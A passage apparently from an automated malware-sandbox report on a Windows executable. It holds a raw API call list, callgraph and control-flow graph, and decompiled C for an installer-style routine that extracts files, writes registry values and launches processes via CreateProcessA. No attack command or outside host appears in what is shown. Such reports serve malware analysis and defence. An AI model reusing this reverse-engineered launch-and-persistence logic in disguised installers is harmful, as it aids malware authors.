calls 2731->2733 2734 11d6285 GetLastError 2732->2734 2735 11d3013 2733->2735 2736 11d625f 2734->2736 2735->2445 2735->2456 2736->2731 2738 11d3b2d 2737->2738 2738->2738 2739 11d3b72 2738->2739 2740 11d3b53 2738->2740 2941 11d4fe0 2739->2941 2742 11d6517 24 API calls 2740->2742 2743 11d3b70 2742->2743 2744 11d3b7b 2743->2744 2745 11d6298 10 API calls 2743->2745 2744->2461 2745->2744 2747 11d2583 2746->2747 2748 11d2622 2746->2748 2750 11d25e8 RegOpenKeyExA 2747->2750 2751 11d258b 2747->2751 2971 11d24e0 GetWindowsDirectoryA 2748->2971 2752 11d25e3 2750->2752 2753 11d2609 RegQueryInfoKeyA 2750->2753 2751->2752 2755 11d259b RegOpenKeyExA 2751->2755 2752->2466 2754 11d25d1 RegCloseKey 2753->2754 2754->2752 2755->2752 2756 11d25bc RegQueryValueExA 2755->2756 2756->2754 2758 11d3bdb 2757->2758 2769 11d3bec 2757->2769 2759 11d468f 7 API calls 2758->2759 2759->2769 2760 11d3c03 memset 2760->2769 2761 11d3d13 2763 11d44b9 20 API calls 2761->2763 2762 11d468f 7 API calls 2762->2769 2790 11d3d26 2763->2790 2764 11d3f4d 2766 11d6ce0 4 API calls 2764->2766 2767 11d3f60 2766->2767 2767->2470 2768 11d3d7b CompareStringA 2768->2769 2778 11d3fd7 2768->2778 2769->2760 2769->2761 2769->2762 2769->2764 2769->2768 2770 11d3fab 2769->2770 2774 11d3f1e LocalFree 2769->2774 2775 11d3f46 LocalFree 2769->2775 2769->2778 2780 11d3cc7 CompareStringA 2769->2780 2791 11d3e10 2769->2791 2979 11d1ae8 2769->2979 3019 11d202a memset memset RegCreateKeyExA 2769->3019 3045 11d3fef 2769->3045 2773 11d44b9 20 API calls 2770->2773 2777 11d3fbe LocalFree 2773->2777 2774->2769 2774->2778 2775->2764 2777->2764 2778->2764 3069 11d2267 2778->3069 2780->2769 2781 11d3e1f GetProcAddress 2784 11d3f64 2781->2784 2781->2791 2782 11d3f92 2783 11d44b9 20 API calls 2782->2783 2785 11d3fa9 2783->2785 2786 11d44b9 20 API calls 2784->2786 2787 11d3f7c LocalFree 2785->2787 2788 11d3f75 FreeLibrary 2786->2788 2789 11d6285 GetLastError 2787->2789 2788->2787 2789->2790 2790->2764 2791->2781 2791->2782 2792 11d3eff FreeLibrary 2791->2792 2793 11d3f40 FreeLibrary 2791->2793 3059 11d6495 2791->3059 2792->2774 2793->2775 2795 11d468f 7 API calls 2794->2795 2796 11d3a55 LocalAlloc 2795->2796 2797 11d3a6c 2796->2797 2798 11d3a8e 2796->2798 2799 11d44b9 20 API calls 2797->2799 2800 11d468f 7 API calls 2798->2800 2801 11d3a7d 2799->2801 2802 11d3a98 2800->2802 2803 11d6285 GetLastError 2801->2803 2804 11d3a9c 2802->2804 2805 11d3ac5 lstrcmpA 2802->2805 2806 11d2f64 2803->2806 2807 11d44b9 20 API calls 2804->2807 2808 11d3b0d LocalFree 2805->2808 2809 11d3ada 2805->2809 2806->2436 2806->2445 2811 11d3aad LocalFree 2807->2811 2808->2806 2810 11d6517 24 API calls 2809->2810 2812 11d3aec LocalFree 2810->2812 2811->2806 2812->2806 2814 11d303c 2813->2814 2814->2445 2816 11d468f 7 API calls 2815->2816 2817 11d417d LocalAlloc 2816->2817 2818 11d41a8 2817->2818 2819 11d4195 2817->2819 2821 11d468f 7 API calls 2818->2821 2820 11d44b9 20 API calls 2819->2820 2822 11d41a6 2820->2822 2823 11d41b5 2821->2823 2822->2445 2824 11d41b9 2823->2824 2825 11d41c5 lstrcmpA 2823->2825 2827 11d44b9 20 API calls 2824->2827 2825->2824 2826 11d41e6 LocalFree 2825->2826 2826->2822 2827->2826 2829 11d171e _vsnprintf 2828->2829 2830 11d62c9 FindResourceA 2829->2830 2832 11d62cb LoadResource LockResource 2830->2832 2833 11d6353 2830->2833 2832->2833 2836 11d62e0 2832->2836 2834 11d6ce0 4 API calls 2833->2834 2835 11d51ca 2834->2835 2835->2673 2835->2674 2837 11d631b FreeResource 2836->2837 2838 11d6355 FreeResource 2836->2838 2839 11d171e _vsnprintf 2837->2839 2838->2833 2839->2830 2841 11d548a 2840->2841 2843 11d551a 2840->2843 2901 11d53a1 2841->2901 2912 11d58c8 2843->2912 2844 11d5581 2848 11d6ce0 4 API calls 2844->2848 2847 11d5495 2847->2844 2851 11d550c 2847->2851 2852 11d54c2 GetSystemInfo 2847->2852 2853 11d559a 2848->2853 2849 11d554d 2849->2844 2856 11d597d 34 API calls 2849->2856 2850 11d553b CreateDirectoryA 2854 11d5577 2850->2854 2855 11d5547 2850->2855 2857 11d658a CharPrevA 2851->2857 2861 11d54da 2852->2861 2853->2692 2864 11d2630 GetWindowsDirectoryA 2853->2864 2858 11d6285 GetLastError 2854->2858 2855->2849 2859 11d555c 2856->2859 2857->2843 2860 11d557c 2858->2860 2859->2844 2863 11d5568 RemoveDirectoryA 2859->2863 2860->2844 2861->2851 2862 11d658a CharPrevA 2861->2862 2862->2851 2863->2844 2865 11d266f 2864->2865 2866 11d265e 2864->2866 2868 11d6ce0 4 API calls 2865->2868 2867 11d44b9 20 API calls 2866->2867 2867->2865 2869 11d2687 2868->2869 2869->2706 2869->2715 2871 11d696e GetDiskFreeSpaceA 2870->2871 2872 11d69a1 2870->2872 2871->2872 2873 11d6989 MulDiv 2871->2873 2872->2724 2873->2872 2875 11d59dd GetDiskFreeSpaceA 2874->2875 2876 11d59bb 2874->2876 2877 11d5ba1 memset 2875->2877 2878 11d5a21 MulDiv 2875->2878 2879 11d44b9 20 API calls 2876->2879 2880 11d6285 GetLastError 2877->2880 2878->2877 2881 11d5a50 GetVolumeInformationA 2878->2881 2882 11d59cc 2879->2882 2883 11d5bbc GetLastError FormatMessageA 2880->2883 2884 11d5a6e memset 2881->2884 2885 11d5ab5 SetCurrentDirectoryA 2881->2885 2886 11d6285 GetLastError 2882->2886 2887 11d5be3 2883->2887 2888 11d6285 GetLastError 2884->2888 2895 11d5acc 2885->2895 2889 11d59d1 2886->2889 2890 11d44b9 20 API calls 2887->2890 2891 11d5a89 GetLastError FormatMessageA 2888->2891 2899 11d5b94 2889->2899 2892 11d5bf5 SetCurrentDirectoryA 2890->2892 2891->2887 2892->2899 2893 11d6ce0 4 API calls 2894 11d5c11 2893->2894 2894->2706 2896 11d5b0a 2895->2896 2898 11d5b20 2895->2898 2897 11d44b9 20 API calls 2896->2897 2897->2889 2898->2899 2924 11d268b 2898->2924 2899->2893 2903 11d53bf 2901->2903 2902 11d171e _vsnprintf 2902->2903 2903->2902 2904 11d658a CharPrevA 2903->2904 2907 11d5415 GetTempFileNameA 2903->2907 2905 11d53fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 11d544f CreateDirectoryA 2905->2906 2906->2907 2908 11d543a 2906->2908 2907->2908 2909 11d5429 DeleteFileA CreateDirectoryA 2907->2909 2910 11d6ce0 4 API calls 2908->2910 2909->2908 2911 11d5449 2910->2911 2911->2847 2913 11d58d8 2912->2913 2913->2913 2914 11d58df LocalAlloc 2913->2914 2915 11d58f3 2914->2915 2918 11d5919 2914->2918 2916 11d44b9 20 API calls 2915->2916 2917 11d5906 2916->2917 2919 11d6285 GetLastError 2917->2919 2921 11d5534 2917->2921 2920 11d658a CharPrevA 2918->2920 2919->2921 2922 11d5931 CreateFileA LocalFree 2920->2922 2921->2849 2921->2850 2922->2917 2923 11d595b CloseHandle GetFileAttributesA 2922->2923 2923->2917 2925 11d26b9 2924->2925 2926 11d26e5 2924->2926 2929 11d171e _vsnprintf 2925->2929 2927 11d271f 2926->2927 2928 11d26ea 2926->2928 2932 11d26e3 2927->2932 2936 11d171e _vsnprintf 2927->2936 2931 11d171e _vsnprintf 2928->2931 2930 11d26cc 2929->2930 2933 11d44b9 20 API calls 2930->2933 2935 11d26fd 2931->2935 2934 11d6ce0 4 API calls 2932->2934 2933->2932 2937 11d276d 2934->2937 2938 11d44b9 20 API calls 2935->2938 2939 11d2735 2936->2939 2937->2899 2938->2932 2940 11d44b9 20 API calls 2939->2940 2940->2932 2942 11d468f 7 API calls 2941->2942 2943 11d4ff5 FindResourceA LoadResource LockResource 2942->2943 2944 11d515f 2943->2944 2945 11d5020 2943->2945 2944->2743 2946 11d5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2945->2946 2947 11d5057 2945->2947 2946->2947 2963 11d4efd 2947->2963 2950 11d507c 2953 11d5106 2950->2953 2954 11d50e8 2950->2954 2951 11d5060 2952 11d44b9 20 API calls 2951->2952 2959 11d5075 2952->2959 2956 11d511d 2953->2956 2957 11d5110 FreeResource 2953->2957 2955 11d44b9 20 API calls 2954->2955 2955->2959 2958 11d513a 2956->2958 2960 11d5129 2956->2960 2957->2956 2958->2944 2962 11d514c SendMessageA 2958->2962 2959->2953 2961 11d44b9 20 API calls 2960->2961 2961->2958 2962->2944 2964 11d4f4a 2963->2964 2965 11d4fa1 2964->2965 2966 11d4980 25 API calls 2964->2966 2967 11d6ce0 4 API calls 2965->2967 2969 11d4f67 2966->2969 2968 11d4fc6 2967->2968 2968->2950 2968->2951 2969->2965 2970 11d4b60 FindCloseChangeNotification 2969->2970 2970->2965 2972 11d255b 2971->2972 2973 11d2510 2971->2973 2975 11d6ce0 4 API calls 2972->2975 2974 11d658a CharPrevA 2973->2974 2976 11d2522 WritePrivateProfileStringA _lopen 2974->2976 2977 11d2569 2975->2977 2976->2972 2978 11d2548 _llseek _lclose 2976->2978 2977->2752 2978->2972 2980 11d1b25 2979->2980 3083 11d1a84 2980->3083 2982 11d1b57 2983 11d658a CharPrevA 2982->2983 2985 11d1b8c 2982->2985 2983->2985 2984 11d66c8 2 API calls 2986 11d1bd1 2984->2986 2985->2984 2987 11d1bd9 CompareStringA 2986->2987 2988 11d1d73 2986->2988 2987->2988 2989 11d1bf7 GetFileAttributesA 2987->2989 2990 11d66c8 2 API calls 2988->2990 2991 11d1c0d 2989->2991 2992 11d1d53 2989->2992 2993 11d1d7d 2990->2993 2991->2992 2998 11d1a84 2 API calls 2991->2998 2996 11d44b9 20 API calls 2992->2996 2994 11d1df8 LocalAlloc 2993->2994 2995 11d1d81 CompareStringA 2993->2995 2994->2992 2997 11d1e0b GetFileAttributesA 2994->2997 2995->2994 3004 11d1d9b 2995->3004 3016 11d1cc2 2996->3016 3008 11d1e1d 2997->3008 3018 11d1e45 2997->3018 2999 11d1c31 2998->2999 3001 11d1c50 LocalAlloc 2999->3001 3009 11d1a84 2 API calls 2999->3009 3000 11d1e89 3003 11d6ce0 4 API calls 3000->3003 3001->2992 3002 11d1c67 GetPrivateProfileIntA GetPrivateProfileStringA 3001->3002 3012 11d1cf8 3002->3012 3002->3016 3007 11d1ea1 3003->3007 3004->3004 3010 11d1dbe LocalAlloc 3004->3010 3007->2769 3008->3018 3009->3001 3010->2992 3011 11d1de1 3010->3011 3013 11d171e _vsnprintf 3011->3013 3014 11d1d09 GetShortPathNameA 3012->3014 3015 11d1d23 3012->3015 3013->3016 3014->3015 3017 11d171e _vsnprintf 3015->3017 3016->3000 3017->3016 3089 11d2aac 3018->3089 3020 11d209a 3019->3020 3021 11d2256 3019->3021 3023 11d171e _vsnprintf 3020->3023 3026 11d20dc 3020->3026 3022 11d6ce0 4 API calls 3021->3022 3024 11d2263 3022->3024 3025 11d20af RegQueryValueExA 3023->3025 3024->2769 3025->3020 3025->3026 3027 11d20fb GetSystemDirectoryA 3026->3027 3028 11d20e4 RegCloseKey 3026->3028 3029 11d658a CharPrevA 3027->3029 3028->3021 3030 11d211b LoadLibraryA 3029->3030 3031 11d212e GetProcAddress FreeLibrary 3030->3031 3032 11d2179 GetModuleFileNameA 3030->3032 3031->3032 3034 11d214e GetSystemDirectoryA 3031->3034 3033 11d21de RegCloseKey 3032->3033 3037 11d2177 3032->3037 3033->3021 3035 11d2165 3034->3035 3034->3037 3036 11d658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 11d21b7 LocalAlloc 3037->3038 3039 11d21cd 3038->3039 3040 11d21ec 3038->3040 3041 11d44b9 20 API calls 3039->3041 3042 11d171e _vsnprintf 3040->3042 3041->3033 3043 11d2218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3021 3046 11d4016 CreateProcessA 3045->3046 3057 11d4106 3045->3057 3047 11d40c4 3046->3047 3048 11d4041 WaitForSingleObject GetExitCodeProcess 3046->3048 3050 11d6285 GetLastError 3047->3050 3051 11d4070 3048->3051 3049 11d6ce0 4 API calls 3052 11d4117 3049->3052 3054 11d40c9 GetLastError FormatMessageA 3050->3054 3116 11d411b 3051->3116 3052->2769 3056 11d44b9 20 API calls 3054->3056 3055 11d4096 CloseHandle CloseHandle 3055->3057 3058 11d40ba 3055->3058 3056->3057 3057->3049 3058->3057 3060 11d64c2 3059->3060 3061 11d658a CharPrevA 3060->3061 3062 11d64d8 GetFileAttributesA 3061->3062 3063 11d64ea 3062->3063 3064 11d6501 LoadLibraryA 3062->3064 3063->3064 3065 11d64ee LoadLibraryExA 3063->3065 3066 11d6508 3064->3066 3065->3066 3067 11d6ce0 4 API calls 3066->3067 3068 11d6513 3067->3068 3068->2791 3070 11d2289 RegOpenKeyExA 3069->3070 3071 11d2381 3069->3071 3070->3071 3072 11d22b1 RegQueryValueExA 3070->3072 3073 11d6ce0 4 API calls 3071->3073 3074 11d2374 RegCloseKey 3072->3074 3075 11d22e6 memset GetSystemDirectoryA 3072->3075 3076 11d238c 3073->3076 3074->3071 3077 11d230f 3075->3077 3078 11d2321 3075->3078 3076->2764 3079 11d658a CharPrevA 3077->3079 3080 11d171e _vsnprintf 3078->3080 3079->3078 3081 11d233f RegSetValueExA 3080->3081 3081->3074 3084 11d1a9a 3083->3084 3086 11d1aba 3084->3086 3088 11d1aaf 3084->3088 3102 11d667f 3084->3102 3086->2982 3087 11d667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 11d2be6 3089->3090 3091 11d2ad4 GetModuleFileNameA 3089->3091 3092 11d6ce0 4 API calls 3090->3092 3101 11d2b02 3091->3101 3094 11d2bf5 3092->3094 3093 11d2af1 IsDBCSLeadByte 3093->3101 3094->3000 3095 11d2bca CharNextA 3098 11d2bd3 CharNextA 3095->3098 3096 11d2b11 CharNextA CharUpperA 3097 11d2b8d CharUpperA 3096->3097 3096->3101 3097->3101 3098->3101 3100 11d2b43 CharPrevA 3100->3101 3101->3090 3101->3093 3101->3095 3101->3096 3101->3098 3101->3100 3107 11d65e8 3101->3107 3103 11d6689 3102->3103 3104 11d66a5 3103->3104 3105 11d6648 IsDBCSLeadByte 3103->3105 3106 11d6697 CharNextA 3103->3106 3104->3084 3105->3103 3106->3103 3108 11d65f4 3107->3108 3108->3108 3109 11d65fb CharPrevA 3108->3109 3110 11d6611 CharPrevA 3109->3110 3111 11d660b 3110->3111 3112 11d661e 3110->3112 3111->3110 3111->3112 3113 11d663d 3112->3113 3114 11d6634 CharNextA 3112->3114 3115 11d6627 CharPrevA 3112->3115 3113->3101 3114->3113 3115->3113 3115->3114 3117 11d4132 3116->3117 3119 11d412a 3116->3119 3120 11d1ea7 3117->3120 3119->3055 3121 11d1eba 3120->3121 3123 11d1ed3 3120->3123 3122 11d256d 15 API calls 3121->3122 3122->3123 3123->3119 3125 11d2026 3124->3125 3126 11d1ff0 RegOpenKeyExA 3124->3126 3125->2479 3126->3125 3127 11d200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3276 11d6a20 __getmainargs 3277 11d19e0 3278 11d1a24 GetDesktopWindow 3277->3278 3279 11d1a03 3277->3279 3280 11d43d0 11 API calls 3278->3280 3281 11d1a16 EndDialog 3279->3281 3283 11d1a20 3279->3283 3282 11d1a33 LoadStringA SetDlgItemTextA MessageBeep 3280->3282 3281->3283 3282->3283 3284 11d6ce0 4 API calls 3283->3284 3285 11d1a7e 3284->3285

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_011D2F1D 3 Function_011D621E 0->3 16 Function_011D3A3F 0->16 23 Function_011D3B26 0->23 40 Function_011D256D 0->40 42 Function_011D4169 0->42 43 Function_011D5164 0->43 60 Function_011D658A 0->60 61 Function_011D6285 0->61 69 Function_011D44B9 0->69 80 Function_011D55A0 0->80 83 Function_011D3BA2 0->83 112 Function_011D51E5 0->112 116 Function_011D6CE0 0->116 1 Function_011D681F 98 Function_011D66F9 1->98 1->116 2 Function_011D171E 34 Function_011D597D 3->34 3->61 3->69 3->116 4 Function_011D411B 77 Function_011D1EA7 4->77 5 Function_011D5C17 6 Function_011D6517 6->69 7 Function_011D3210 22 Function_011D4224 7->22 7->34 7->60 7->69 87 Function_011D43D0 7->87 89 Function_011D58C8 7->89 8 Function_011D7010 9 Function_011D490C 10 Function_011D7208 11 Function_011D7000 12 Function_011D4200 13 Function_011D3100 13->87 14 Function_011D6C03 31 Function_011D724D 14->31 15 Function_011D4702 65 Function_011D1680 15->65 72 Function_011D16B3 15->72 16->6 57 Function_011D468F 16->57 16->61 16->69 17 Function_011D6C3F 18 Function_011D4C37 19 Function_011D2630 19->69 19->116 20 Function_011D6E2A 100 Function_011D6CF0 20->100 21 Function_011D202A 21->2 21->60 21->69 21->116 22->65 22->69 23->6 52 Function_011D6298 23->52 114 Function_011D4FE0 23->114 24 Function_011D7120 25 Function_011D6A20 26 Function_011D7155 27 Function_011D6F54 27->10 27->31 28 Function_011D3450 28->87 29 Function_011D4A50 30 Function_011D6952 32 Function_011D6648 33 Function_011D6F40 59 Function_011D268B 34->59 34->61 34->69 34->116 35 Function_011D667F 35->32 36 Function_011D487A 36->9 37 Function_011D7270 38 Function_011D6C70 39 Function_011D2773 39->60 63 Function_011D1781 39->63 39->65 39->116 115 Function_011D24E0 40->115 41 Function_011D476D 41->6 74 Function_011D66AE 41->74 42->57 42->69 43->52 43->57 43->69 44 Function_011D5467 44->34 44->60 44->61 44->63 44->65 78 Function_011D53A1 44->78 44->89 44->116 45 Function_011D2267 45->2 45->60 45->116 46 Function_011D4B60 47 Function_011D6A60 47->10 47->17 47->26 47->31 48 Function_011D7060 47->48 99 Function_011D2BFB 47->99 48->8 48->24 49 Function_011D6760 50 Function_011D5C9E 50->5 50->20 50->35 50->60 50->65 50->69 90 Function_011D66C8 50->90 50->116 117 Function_011D31E0 50->117 51 Function_011D4E99 51->65 52->2 52->116 53 Function_011D6495 53->60 53->63 53->116 54 Function_011D2390 54->54 54->60 54->65 54->72 54->116 55 Function_011D1F90 55->69 55->77 55->116 56 Function_011D6793 58 Function_011D2A89 59->2 59->69 59->116 60->72 62 Function_011D1A84 62->35 64 Function_011D4980 64->36 64->69 65->63 66 Function_011D3680 67 Function_011D6380 68 Function_011D6FBE 68->27 69->1 69->2 69->65 88 Function_011D67C9 69->88 69->116 70 Function_011D52B6 70->54 70->63 110 Function_011D65E8 70->110 113 Function_011D1FE1 70->113 70->116 71 Function_011D69B0 71->11 71->38 71->68 104 Function_011D71EF 71->104 72->63 73 Function_011D2AAC 73->65 91 Function_011D17C8 73->91 73->110 73->116 75 Function_011D2CAA 75->6 75->50 75->54 75->57 75->69 82 Function_011D18A3 75->82 106 Function_011D36EE 75->106 75->116 76 Function_011D6FA5 76->31 77->40 78->2 78->60 78->65 78->116 79 Function_011D6FA1 80->6 80->19 80->30 80->34 80->44 80->57 80->60 80->61 80->63 80->69 80->116 81 Function_011D4CA0 107 Function_011D17EE 82->107 82->116 83->21 83->45 83->53 83->57 83->61 83->63 83->69 103 Function_011D3FEF 83->103 108 Function_011D1AE8 83->108 83->116 84 Function_011D72A2 85 Function_011D4AD0 85->66 86 Function_011D4CD0 86->15 86->18 86->41 86->46 86->51 86->64 86->116 118 Function_011D47E0 86->118 87->116 88->56 89->60 89->61 89->65 89->69 90->32 92 Function_011D4CC0 93 Function_011D4BC0 94 Function_011D30C0 95 Function_011D63C0 95->60 95->63 95->116 96 Function_011D4EFD 96->46 96->64 96->116 97 Function_011D70FE 99->0 99->55 99->70 99->75 101 Function_011D34F0 101->66 101->69 101->87 102 Function_011D6EF0 103->4 103->61 103->69 103->116 105 Function_011D6BEF 106->1 106->58 106->69 106->88 109 Function_011D28E8 106->109 106->116 107->116 108->2 108->60 108->62 108->63 108->65 108->69 108->72 108->73 108->90 108->116 109->39 109->58 111 Function_011D70EB 112->57 112->61 112->69 114->57 114->69 114->96 115->60 115->116 116->100 118->65 118->69 119 Function_011D19E0 119->87 119->116

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 36 11d3ba2-11d3bd9 37 11d3bfd-11d3bff 36->37 38 11d3bdb-11d3bee call 11d468f 36->38 40 11d3c03-11d3c28 memset 37->40 44 11d3bf4-11d3bf7 38->44 45 11d3d13-11d3d30 call 11d44b9 38->45 42 11d3c2e-11d3c40 call 11d468f 40->42 43 11d3d35-11d3d48 call 11d1781 40->43 42->45 54 11d3c46-11d3c49 42->54 49 11d3d4d-11d3d52 43->49 44->37 44->45 55 11d3f4d 45->55 52 11d3d9e-11d3db6 call 11d1ae8 49->52 53 11d3d54-11d3d6c call 11d468f 49->53 52->55 69 11d3dbc-11d3dc2 52->69 53->45 65 11d3d6e-11d3d75 53->65 54->45 57 11d3c4f-11d3c56 54->57 59 11d3f4f-11d3f63 call 11d6ce0 55->59 61 11d3c58-11d3c5e 57->61 62 11d3c60-11d3c65 57->62 66 11d3c6e-11d3c73 61->66 67 11d3c75-11d3c7c 62->67 68 11d3c67-11d3c6d 62->68 73 11d3d7b-11d3d98 CompareStringA 65->73 74 11d3fda-11d3fe1 65->74 71 11d3c87-11d3c89 66->71 70 11d3c7e-11d3c82 67->70 67->71 68->66 75 11d3dc4-11d3dce 69->75 76 11d3de6-11d3de8 69->76 70->71 71->49 78 11d3c8f-11d3c98 71->78 73->52 73->74 81 11d3fe8-11d3fea 74->81 82 11d3fe3 call 11d2267 74->82 75->76 77 11d3dd0-11d3dd7 75->77 79 11d3dee-11d3df5 76->79 80 11d3f0b-11d3f15 call 11d3fef 76->80 77->76 83 11d3dd9-11d3ddb 77->83 84 11d3c9a-11d3c9c 78->84 85 11d3cf1-11d3cf3 78->85 86 11d3fab-11d3fd2 call 11d44b9 LocalFree 79->86 87 11d3dfb-11d3dfd 79->87 90 11d3f1a-11d3f1c 80->90 81->59 82->81 83->79 91 11d3ddd-11d3de1 call 11d202a 83->91 93 11d3c9e-11d3ca3 84->93 94 11d3ca5-11d3ca7 84->94 85->52 96 11d3cf9-11d3d11 call 11d468f 85->96 86->55 87->80 95 11d3e03-11d3e0a 87->95 97 11d3f1e-11d3f2d LocalFree 90->97 98 11d3f46-11d3f47 LocalFree 90->98 91->76 101 11d3cb2-11d3cc5 call 11d468f 93->101 94->55 102 11d3cad 94->102 95->80 103 11d3e10-11d3e19 call 11d6495 95->103 96->45 96->49 105 11d3fd7-11d3fd9 97->105 106 11d3f33-11d3f3b 97->106 98->55 101->45 112 11d3cc7-11d3ce8 CompareStringA 101->112 102->101 113 11d3e1f-11d3e36 GetProcAddress 103->113 114 11d3f92-11d3fa9 call 11d44b9 103->114 105->74 106->40 112->85 116 11d3cea-11d3ced 112->116 117 11d3e3c-11d3e80 113->117 118 11d3f64-11d3f76 call 11d44b9 FreeLibrary 113->118 123 11d3f7c-11d3f90 LocalFree call 11d6285 114->123 116->85 121 11d3e8b-11d3e94 117->121 122 11d3e82-11d3e87 117->122 118->123 125 11d3e9f-11d3ea2 121->125 126 11d3e96-11d3e9b 121->126 122->121 123->55 127 11d3ead-11d3eb6 125->127 128 11d3ea4-11d3ea9 125->128 126->125 130 11d3eb8-11d3ebd 127->130 131 11d3ec1-11d3ec3 127->131 128->127 130->131 133 11d3ece-11d3eec 131->133 134 11d3ec5-11d3eca 131->134 137 11d3eee-11d3ef3 133->137 138 11d3ef5-11d3efd 133->138 134->133 137->138 139 11d3eff-11d3f09 FreeLibrary 138->139 140 11d3f40 FreeLibrary 138->140 139->97 140->98
                                                                      C-Code - Quality: 82%
                                                                      			E011D3BA2() {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v276;
                                                                      				char _v280;
                                                                      				short _v300;
                                                                      				intOrPtr _v304;
                                                                      				void _v348;
                                                                      				char _v352;
                                                                      				intOrPtr _v356;
                                                                      				signed int _v360;
                                                                      				short _v364;
                                                                      				char* _v368;
                                                                      				intOrPtr _v372;
                                                                      				void* _v376;
                                                                      				intOrPtr _v380;
                                                                      				char _v384;
                                                                      				signed int _v388;
                                                                      				intOrPtr _v392;
                                                                      				signed int _v396;
                                                                      				signed int _v400;
                                                                      				signed int _v404;
                                                                      				void* _v408;
                                                                      				void* _v424;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t69;
                                                                      				signed int _t76;
                                                                      				void* _t77;
                                                                      				signed int _t79;
                                                                      				short _t96;
                                                                      				signed int _t97;
                                                                      				intOrPtr _t98;
                                                                      				signed int _t101;
                                                                      				signed int _t104;
                                                                      				signed int _t108;
                                                                      				int _t112;
                                                                      				void* _t115;
                                                                      				signed char _t118;
                                                                      				void* _t125;
                                                                      				signed int _t127;
                                                                      				void* _t128;
                                                                      				struct HINSTANCE__* _t129;
                                                                      				void* _t130;
                                                                      				short _t137;
                                                                      				char* _t140;
                                                                      				signed char _t144;
                                                                      				signed char _t145;
                                                                      				signed int _t149;
                                                                      				void* _t150;
                                                                      				void* _t151;
                                                                      				signed int _t153;
                                                                      				void* _t155;
                                                                      				void* _t156;
                                                                      				signed int _t157;
                                                                      				signed int _t162;
                                                                      				signed int _t164;
                                                                      				void* _t165;
                                                                      
                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                      				_t69 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t69 ^ _t164;
                                                                      				_t153 = 0;
                                                                      				 *0x11d9124 =  *0x11d9124 & 0;
                                                                      				_t149 = 0;
                                                                      				_v388 = 0;
                                                                      				_v384 = 0;
                                                                      				_t165 =  *0x11d8a28 - _t153; // 0x0
                                                                      				if(_t165 != 0) {
                                                                      					L3:
                                                                      					_t127 = 0;
                                                                      					_v392 = 0;
                                                                      					while(1) {
                                                                      						_v400 = _v400 & 0x00000000;
                                                                      						memset( &_v348, 0, 0x44);
                                                                      						_t164 = _t164 + 0xc;
                                                                      						_v348 = 0x44;
                                                                      						if( *0x11d8c42 != 0) {
                                                                      							goto L26;
                                                                      						}
                                                                      						_t146 =  &_v396;
                                                                      						_t115 = E011D468F("SHOWWINDOW",  &_v396, 4);
                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                      							L25:
                                                                      							_t146 = 0x4b1;
                                                                      							E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      							 *0x11d9124 = 0x80070714;
                                                                      							goto L62;
                                                                      						} else {
                                                                      							if(_v396 != 1) {
                                                                      								__eflags = _v396 - 2;
                                                                      								if(_v396 != 2) {
                                                                      									_t137 = 3;
                                                                      									__eflags = _v396 - _t137;
                                                                      									if(_v396 == _t137) {
                                                                      										_v304 = 1;
                                                                      										_v300 = _t137;
                                                                      									}
                                                                      									goto L14;
                                                                      								}
                                                                      								_push(6);
                                                                      								_v304 = 1;
                                                                      								_pop(0);
                                                                      								goto L11;
                                                                      							} else {
                                                                      								_v304 = 1;
                                                                      								L11:
                                                                      								_v300 = 0;
                                                                      								L14:
                                                                      								if(_t127 != 0) {
                                                                      									L27:
                                                                      									_t155 = 1;
                                                                      									__eflags = _t127 - 1;
                                                                      									if(_t127 != 1) {
                                                                      										L31:
                                                                      										_t132 =  &_v280;
                                                                      										_t76 = E011D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                      										__eflags = _t76;
                                                                      										if(_t76 == 0) {
                                                                      											L62:
                                                                      											_t77 = 0;
                                                                      											L63:
                                                                      											_pop(_t150);
                                                                      											_pop(_t156);
                                                                      											_pop(_t128);
                                                                      											return E011D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                      										}
                                                                      										_t157 = _v404;
                                                                      										__eflags = _t149;
                                                                      										if(_t149 != 0) {
                                                                      											L37:
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												L57:
                                                                      												_t151 = _v408;
                                                                      												_t146 =  &_v352;
                                                                      												_t130 = _t151; // executed
                                                                      												_t79 = E011D3FEF(_t130,  &_v352); // executed
                                                                      												__eflags = _t79;
                                                                      												if(_t79 == 0) {
                                                                      													L61:
                                                                      													LocalFree(_t151);
                                                                      													goto L62;
                                                                      												}
                                                                      												L58:
                                                                      												LocalFree(_t151);
                                                                      												_t127 = _t127 + 1;
                                                                      												_v396 = _t127;
                                                                      												__eflags = _t127 - 2;
                                                                      												if(_t127 >= 2) {
                                                                      													_t155 = 1;
                                                                      													__eflags = 1;
                                                                      													L69:
                                                                      													__eflags =  *0x11d8580;
                                                                      													if( *0x11d8580 != 0) {
                                                                      														E011D2267();
                                                                      													}
                                                                      													_t77 = _t155;
                                                                      													goto L63;
                                                                      												}
                                                                      												_t153 = _v392;
                                                                      												_t149 = _v388;
                                                                      												continue;
                                                                      											}
                                                                      											L38:
                                                                      											__eflags =  *0x11d8180;
                                                                      											if( *0x11d8180 == 0) {
                                                                      												_t146 = 0x4c7;
                                                                      												E011D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                      												LocalFree(_v424);
                                                                      												 *0x11d9124 = 0x8007042b;
                                                                      												goto L62;
                                                                      											}
                                                                      											__eflags = _t157;
                                                                      											if(_t157 == 0) {
                                                                      												goto L57;
                                                                      											}
                                                                      											__eflags =  *0x11d9a34 & 0x00000004;
                                                                      											if(__eflags == 0) {
                                                                      												goto L57;
                                                                      											}
